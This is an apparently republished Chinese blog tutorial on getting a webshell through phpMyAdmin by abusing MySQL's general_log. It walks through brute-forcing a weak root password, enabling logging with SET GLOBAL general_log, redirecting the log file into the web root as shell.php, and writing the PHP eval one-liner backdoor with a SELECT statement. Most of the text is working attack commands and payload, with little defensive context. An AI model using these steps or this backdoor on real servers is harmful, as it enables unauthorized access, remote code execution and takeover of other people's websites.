當(dāng)前位置：首頁 > 编程语言 > php >内容正文

php

shell 写入文件_phpMyAdmin利用日志文件GetSHELL

發(fā)布時間：2025/3/12 php 19 豆豆

生活随笔收集整理的這篇文章主要介紹了 shell 写入文件_phpMyAdmin利用日志文件GetSHELL 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

phpMyAdmin 是眾多MySQL圖形化管理工具中使用最為廣泛的一種，是一款使用PHP 開發(fā)的基于B/S模式的MySQL客戶端軟件，該工具是基于 Web 跨平臺的管理程序，并且支持簡體中文，用戶可以在官網(wǎng)上下載最新版本的。

1、phpMyAdmin利用日志文件GetSHELL前提賬號必須有可讀可寫權(quán)限

2、MySQL版本大于5.0，MySQL 5.0版本以上會創(chuàng)建日志文件，我們通過修改日志文件的全局變量，就可以GetSHELL

3、滿足上方兩個條件，還需要知道網(wǎng)站的絕對路徑,對于網(wǎng)站的絕對路徑查找有很多方法，在我上一篇文章里有講解到：傳送門

這邊是通過php探針獲取到了網(wǎng)站的絕對路徑:C:/phpStudy/WWW

接著是通過弱口令爆破來得到了phpMyAdmin的登陸賬號密碼:root

進(jìn)入到phpMyAdmin管理頁面后，得到一些關(guān)鍵信息：

服務(wù)器: localhost via TCP/IP軟件: MySQL軟件版本: 5.5.40 - MySQL Community Server (GPL)協(xié)議版本: 10用戶: root@localhost服務(wù)器字符集: UTF-8 Unicode (utf8)

Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17數(shù)據(jù)庫客戶端版本: libmysql - 5.0.51aPHP 擴(kuò)展: mysqli 文檔

得知MySQL的版本是大于5.0，那么應(yīng)該可以通過日志寫入shell

查看日志的信息

show variables like '%general%';

日志讀寫默認(rèn)是關(guān)閉的OFF,然后我們打開日志讀寫功能：

打開general_log日志讀寫功能SET GLOBAL general_log='on'

由于之前我們通過php探針得到了網(wǎng)站的絕對路徑，然后我們就可以寫入shell.php到網(wǎng)站的根目錄下：

SET GLOBAL general_log_file='C:/phpStudy/WWW/shell.php'

這個時候，對應(yīng)的路徑下就會生成一個shell.php腳本文件：

PHP一句話木馬：

1<?php @eval($_POST[liuwx]);?>

寫入一句話語句：

1SELECT '<?php @eval($_POST[liuwx]);?>'

這個時候就成功寫入一句話到了shell.php里：

成功GetSHELL:

以上是生活随笔為你收集整理的shell 写入文件_phpMyAdmin利用日志文件GetSHELL的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。